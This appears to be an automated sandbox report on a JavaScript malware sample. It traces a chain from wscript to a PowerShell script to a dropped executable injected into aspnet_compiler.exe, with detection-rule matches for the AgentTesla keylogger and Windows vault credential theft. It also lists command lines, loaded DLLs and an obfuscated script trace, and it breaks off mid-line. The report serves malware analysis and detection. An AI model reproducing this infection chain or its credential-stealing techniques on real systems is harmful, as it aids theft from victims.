                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, xljC6U.cs.Net Code: YPw7g

                    System Summary

                    barindex
                    Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 8152, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: QWQWSAADAF.exe.9.drStatic PE information: section name: .-L3/F
                    Source: QWQWSAADAF.exe.9.drStatic PE information: section name:
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeJump to dropped file
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF28D011_2_00CF28D0
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF084811_2_00CF0848
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF702B11_2_00CF702B
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF843011_2_00CF8430
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF81C811_2_00CF81C8
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF11EF11_2_00CF11EF
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF6AC011_2_00CF6AC0
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF28C011_2_00CF28C0
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF848211_2_00CF8482
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF084711_2_00CF0847
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF698011_2_00CF6980
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF81BF11_2_00CF81BF
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF83E411_2_00CF83E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01604AC812_2_01604AC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0160AD1812_2_0160AD18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01603EB012_2_01603EB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_016041F812_2_016041F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0696234812_2_06962348
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_069659A012_2_069659A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0696004012_2_06960040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_069652B812_2_069652B8
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RUNPEE.dll 480FE5832E1E06DE33096FCE7DD5E90BB1EC7203BF96664CF50E004B66A33854
                    Source: PO_111101111001.jsInitial sample: Strings found which are bigger than 50
                    Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Process Memory Space: powershell.exe PID: 8152, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: QWQWSAADAF.exe.9.drStatic PE information: Section: .-L3/F ZLIB complexity 1.0014322916666667
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, 9O2OLI.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, hdYUG.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, LGBZ4N2f.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, F8OmG.csCryptographic APIs: 'CreateDecryptor'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, Bgo.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, k7FmsUgnvL.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@8/8@3/2
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\devil[1].ps1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\WTRTRWFSHS.ps1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003299000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: PO_111101111001.jsReversingLabs: Detection: 27%
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe"
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Binary string: WASCDZF.pdbTFnF source: QWQWSAADAF.exe, 0000000B.00000000.1339764750.00000000003B2000.00000002.00000001.01000000.0000000A.sdmp, QWQWSAADAF.exe.9.dr
                    Source: Binary string: WASCDZF.pdb source: QWQWSAADAF.exe, 0000000B.00000000.1339764750.00000000003B2000.00000002.00000001.01000000.0000000A.sdmp, QWQWSAADAF.exe.9.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.Name();ITextStream.WriteLine(" entry:470 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:470 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:490 f:l a0:526 a1:%22qaek%22");ITextStream.WriteLine(" exit:490 f:l r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:484 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:484 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:496 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:496 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:511 f:l a0:529 a1:%22Sp)8%22");ITextStream.WriteLine(" exit:511 f:l 